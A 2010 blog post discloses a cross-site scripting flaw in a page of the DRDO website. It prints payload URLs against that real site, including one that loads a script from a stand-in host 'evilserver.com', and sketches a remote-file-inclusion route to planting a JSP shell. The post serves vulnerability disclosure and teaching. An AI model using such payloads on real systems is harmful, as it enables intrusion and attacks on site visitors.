Monthly Archives: October 2010

NASA has it, And so Does DRDO

NASA has it, FBI has it, Most of the Govt agencies/organinzations has it and DRDO also has it, what is it ?

Well thats the most common security flaw in web applications  ” THE XSS (Cross Site Scripting)”.  XSS vulnerabilities are due to improper or lack of sanitization of input variables in server side scripts, which leads to execute external/embedded javascripts on the client side browser.

Vulnerable URL:

http://www.drdo.gov.in/drdo/labs/CAIR/English/index.jsp?pg=<script>alert(‘XSS is here’);</script>

The vulnerability lies in the index.jsp page, the variable “pg” is not properly sanitized, thats why it allows artibrary javascript to be included. But the goodness here is, it does not allows remote javascripts to be run.

http://www.drdo.gov.in/drdo/labs/CAIR/English/index.jsp?pg=<SCRIPT/XSS SRC=”http://evilserver.com/xss.js”></SCRIPT>

The above script will not work because, the administrator at DRDO was smart enough to set the REMOTE INCLUDE [something like that, i forgot the exact name] to DISALLOW in apache server configuration, thats why scripts within the host directory will alone run.

If the above setting [remote include]  had not been  done another serious vulnerability would have been induced, Its RFI [REMOTE FILE INCLUSION]

From the above URL’s it is pretty obvious that the index.jsp’s pg variable includes the local jsp page [awards.jsp/Director.jsp] in the frame, so if the remote include feature had been set on, we could have uploaded a jsp shell script on our server and we could included it inside index.jsp.

so that it will get executed on DRDO’s server and w00t, DRDO would have been r00t’ed.

This Vulnerablility had been reported to keeda/null on 17-10-10

Advertisements